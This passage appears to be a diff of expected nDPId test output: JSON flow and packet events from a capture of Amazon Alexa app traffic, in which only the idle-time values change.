+00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":683,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":54,"flow_packet_id":2,"flow_last_seen":1490976047602,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976047602,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPMGqqU0VdHYrBAq2AG71JuiSVznYK0iJ6AScSA47wAAAgQFtAQCCAptkKkCAPZQ5AEDAwg="} +00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":684,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":54,"flow_packet_id":3,"flow_last_seen":1490976047603,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976047603,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0csNAAEAG6uqsECrYNFXR2NSbAbtgrSInoklc6IAQAVfXgQAAAQEICgD2UOhtkKkC"} +00853{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":685,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976047560,"flow_last_seen":1490976047610,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1490976047610,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54427,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"5ee142340adf02ded757447e2ff78986","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":687,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1490976047629,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976047629,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwJsxAAOcGf3ZIFc6HrBAq2AG7pJ+6tUVgg\/ibBnASH\/6xFgAAAgQFtAEDAwY="} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":688,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1490976047631,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976047631,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoy+JAAEAGgWisECrYSBXOh6SfAbuD+JsGurVFYVAQAVf7hwAA"} +00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":689,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976047563,"flow_last_seen":1490976047631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":237,"flow_tot_l4_payload_len":237,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976047631,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42143,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00907{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":693,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976047560,"flow_last_seen":1490976047664,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":673,"flow_avg_l4_payload_len":112,"midstream":0,"thread_ts_msec":1490976047664,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54427,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"5ee142340adf02ded757447e2ff78986","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +00909{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":704,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976047563,"flow_last_seen":1490976047695,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":237,"flow_tot_l4_payload_len":393,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1490976047695,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42143,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":719,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976047858,"flow_last_seen":1490976047858,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976047858,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42144,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":719,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1490976047858,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976047858,"pkt":"AMDKkaPvePiC0\/vCCABFAAA84nJAAEAGasSsECrYSBXOh6SgAbtFc7NzAAAAAKAC\/\/9pQAAAAgQFtAQCCAoA9lEBAAAAAAEDAwg="} +00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":721,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":56,"flow_packet_id":2,"flow_last_seen":1490976047907,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976047907,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwsPFAAOcG9VBIFc6HrBAq2AG7pKCmhnFJRXOzdHASH\/6\/cgAAAgQFtAEDAwY="} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":722,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":56,"flow_packet_id":3,"flow_last_seen":1490976047908,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976047908,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo4nNAAEAGatesECrYSBXOh6SgAbtFc7N0poZxSlAQAVcJ5AAA"} +00855{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":723,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976047858,"flow_last_seen":1490976047908,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":237,"flow_tot_l4_payload_len":237,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976047908,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42144,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00909{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":726,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1490976047858,"flow_last_seen":1490976047956,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":237,"flow_tot_l4_payload_len":393,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1490976047956,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42144,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"fls-na.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d199ba0af2b08e204c73d6d81a1fd260","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} 00190{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":757,"source":"alexa-app.pcapng","alias":"nDPId-test","layer_type":35085,"global_ts_msec":1490976048620} 00357{"packet_event_id":1,"packet_event_name":"packet","packet_id":757,"source":"alexa-app.pcapng","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":35085,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1490976048429,"pkt":"AMDKkaPvePiC0\/vCiQ0CDAoBZRIAwMqRdPh4+ILT+8IAwMqRo+\/dFACgxgAAAAAAAAAAAAAAAAAAAAAA"} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":780,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976054009,"flow_last_seen":1490976054009,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976054009,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45687,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":780,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1490976054009,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976054009,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8L1JAAEAGF52sECrYNF7ohrJ3AbtDNXw1AAAAAKAC\/\/+MNwAAAgQFtAQCCAoA9lNnAAAAAAEDAwg="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":781,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1490976054070,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976054070,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwt0ZAAOcG6LM0XuiGrBAq2AG7snc6VHcpQzV8NnASH\/5LIgAAAgQFtAEDAwY="} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":782,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1490976054071,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976054071,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoL1NAAEAGF7CsECrYNF7ohrJ3AbtDNXw2OlR3KlAQAVeVkwAA"} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":783,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976054009,"flow_last_seen":1490976054072,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976054072,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45687,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":785,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976054009,"flow_last_seen":1490976054168,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976054168,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45687,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} +00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":780,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976054009,"flow_last_seen":1490976054009,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976054009,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45687,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":780,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1490976054009,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976054009,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8L1JAAEAGF52sECrYNF7ohrJ3AbtDNXw1AAAAAKAC\/\/+MNwAAAgQFtAQCCAoA9lNnAAAAAAEDAwg="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":781,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1490976054070,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976054070,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwt0ZAAOcG6LM0XuiGrBAq2AG7snc6VHcpQzV8NnASH\/5LIgAAAgQFtAEDAwY="} +00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":782,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1490976054071,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976054071,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoL1NAAEAGF7CsECrYNF7ohrJ3AbtDNXw2OlR3KlAQAVeVkwAA"} +00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":783,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976054009,"flow_last_seen":1490976054072,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976054072,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45687,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":785,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976054009,"flow_last_seen":1490976054168,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1490976054168,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45687,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} 00536{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":796,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976055356,"flow_last_seen":1490976055356,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1490976055356,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"224.0.0.1","l4_proto":2,"flow_datalink":1,"flow_max_packets":3} 00445{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":796,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1490976055356,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":46,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":38,"pkt_len":46,"pkt_l4_len":8,"thread_ts_msec":1490976055356,"pkt":"AQBeAAABAMDKkaPvCABGwAAgAABAAAECBBcAAAAA4AAAAZQEAAARZO6bAAAAAA=="} 00595{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":796,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976055356,"flow_last_seen":1490976055356,"flow_idle_time":600000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1490976055356,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"224.0.0.1","l4_proto":2,"ndpi": {"confidence": {"4":"DPI"},"proto":"IGMP","breed":"Acceptable","category":"Network"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":802,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976057977,"flow_last_seen":1490976057977,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976057977,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45688,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":802,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1490976057977,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976057977,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8quhAAEAGnAasECrYNF7ohrJ4AbvwDv4cAAAAAKAC\/\/9b6AAAAgQFtAQCCAoA9lT0AAAAAAEDAwg="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":803,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":1490976058029,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976058029,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw9qRAAOcGqVU0XuiGrBAq2AG7snh1d2z38A7+HXASH\/7rbgAAAgQFtAEDAwY="} -00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":804,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":59,"flow_packet_id":3,"flow_last_seen":1490976058030,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976058030,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoqulAAEAGnBmsECrYNF7ohrJ4AbvwDv4ddXds+FAQAVc14AAA"} -00857{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":805,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976057977,"flow_last_seen":1490976058032,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"thread_ts_msec":1490976058032,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45688,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -01020{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":806,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1490976057977,"flow_last_seen":1490976058082,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976058082,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45688,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":811,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976058103,"flow_last_seen":1490976058103,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976058103,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34041,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":811,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1490976058103,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976058103,"pkt":"AMDKkaPvePiC0\/vCCABFAAA87D9AAEAGJ+usECrYNu8YuoT5Abs\/ELk9AAAAAKAC\/\/9McwAAAgQFtAQCCAoA9lUCAAAAAAEDAwg="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":815,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":60,"flow_packet_id":2,"flow_last_seen":1490976058160,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1490976058160,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw5wBAAOcGhjU27xi6rBAq2AG7hPl2s2uGPxC5PnASH\/7cPAAAAgQFtAEDAwY="} -00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":816,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":60,"flow_packet_id":3,"flow_last_seen":1490976058162,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1490976058162,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo7EBAAEAGJ\/6sECrYNu8YuoT5Abs\/ELk+drNrh1AQAVcmrgAA"} -00882{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":817,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976058103,"flow_last_seen":1490976058166,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":259,"flow_tot_l4_payload_len":259,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1490976058166,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34041,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"},"tls": 